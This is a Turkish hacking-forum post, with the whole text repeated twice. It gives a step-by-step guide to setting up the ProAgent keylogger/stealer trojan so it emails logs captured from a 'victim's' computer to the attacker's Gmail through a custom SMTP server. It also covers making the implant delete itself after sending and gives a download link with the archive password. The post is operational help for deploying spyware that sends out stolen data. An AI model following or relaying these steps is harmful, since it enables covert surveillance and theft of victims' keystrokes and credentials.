TuRK_HaRD
нα¢кιηg αяαşтıямα¢ıѕı
ProAgent'ta mail Problemine SON !! "Gelişmiş Ayarlar"la artık Hiçbir sorun Kalmayacak
((ProAgent Detaylı Anlatımı İçin TIKLAYIN!))
Trojan ve keylogger/stealer'larımızı yenilemeye, sorunları gidermeye devam ediyoruz!
Pek fazla kullanıcı tarafından bilinmeyen proagent gelişmiş ayarları ile mail problemini ortadan kaldırıyoruz artık..
Döküman tamamen tarafıma, yani TuRK_HaRD'a aittir bu arada..
İhtiyacımız bir tek Gmail mail adresi
Resimli anlatıma başlayalım.. İlk olarak programımızı açalım (Download linki aşağıda..)
ve "Select Language"den dilini "Türkçe"ye çevirelim ki daha anlaşılır olsun:
Ardından "Gelişmiş Ayarlar" menüsünden "Ayarlar"a tıklayalım:
Önemli kısım burası.. Alttaki resimdeki gibi "Benim smtp Serverımı kullan" ve
"Farklı bir smtp protu kullan" kısımlarına tik atalım.. Ve smtp server adresimizi ve portunu girelim:
İstersek yine bu ayar sayfasında "Mail Gönderme" bölümünde,
kurbanın bilgisayarından kayıtların bir kere gönderilmesini, ardından server'ın silinmesini ayarlayabiliriz..
Yine server için bir kaldırılma tarihi belirleyebilirsiniz ("Otomatik Kaldırma" bölümünden)
Gmail'in "SPAM" klasörüne bakıyoruz.. ve işte test maili gelmiş
Böylece artık "Proagent'tan mail alamıyorum", "Test mesajı bile gelmiyor",
"Mail servisi çalışmyor" yakınmalarından kurtulmuş oluyoruz..
ProAgent v2.1 SE Download = http://rapidshare.com/files/39457145/ProAgent-v2.1.9-S.E__by_TuRK_HaRD.rar
rar şifresi = turk_hard
kolay gelsin, iyi çalışmalar herkese..
(BU DÖKÜMAN TAMAMEN TARAFIMA (TuRK_HaRD'a) AİT OLUP LÜTFEN İZİNSİZ KOPYALAMAYINIZ..)
Beğendiğiniz paylaşımlarda
TEŞEKKÜR BUTONU'nu kullanmayı unutmayın..
((ProAgent Detaylı Anlatımı İçin TIKLAYIN!))
Trojan ve keylogger/stealer'larımızı yenilemeye, sorunları gidermeye devam ediyoruz!
Pek fazla kullanıcı tarafından bilinmeyen proagent gelişmiş ayarları ile mail problemini ortadan kaldırıyoruz artık..
Döküman tamamen tarafıma, yani TuRK_HaRD'a aittir bu arada..
İhtiyacımız bir tek Gmail mail adresi
Resimli anlatıma başlayalım.. İlk olarak programımızı açalım (Download linki aşağıda..)
ve "Select Language"den dilini "Türkçe"ye çevirelim ki daha anlaşılır olsun:
Ardından "Gelişmiş Ayarlar" menüsünden "Ayarlar"a tıklayalım:
Önemli kısım burası.. Alttaki resimdeki gibi "Benim smtp Serverımı kullan" ve
"Farklı bir smtp protu kullan" kısımlarına tik atalım.. Ve smtp server adresimizi ve portunu girelim:
İstersek yine bu ayar sayfasında "Mail Gönderme" bölümünde,
kurbanın bilgisayarından kayıtların bir kere gönderilmesini, ardından server'ın silinmesini ayarlayabiliriz..
Yine server için bir kaldırılma tarihi belirleyebilirsiniz ("Otomatik Kaldırma" bölümünden)
Gmail'in "SPAM" klasörüne bakıyoruz.. ve işte test maili gelmiş
Böylece artık "Proagent'tan mail alamıyorum", "Test mesajı bile gelmiyor",
"Mail servisi çalışmyor" yakınmalarından kurtulmuş oluyoruz..
ProAgent v2.1 SE Download = http://rapidshare.com/files/39457145/ProAgent-v2.1.9-S.E__by_TuRK_HaRD.rar
rar şifresi = turk_hard
kolay gelsin, iyi çalışmalar herkese..
(BU DÖKÜMAN TAMAMEN TARAFIMA (TuRK_HaRD'a) AİT OLUP LÜTFEN İZİNSİZ KOPYALAMAYINIZ..)
Beğendiğiniz paylaşımlarda
TEŞEKKÜR BUTONU'nu kullanmayı unutmayın..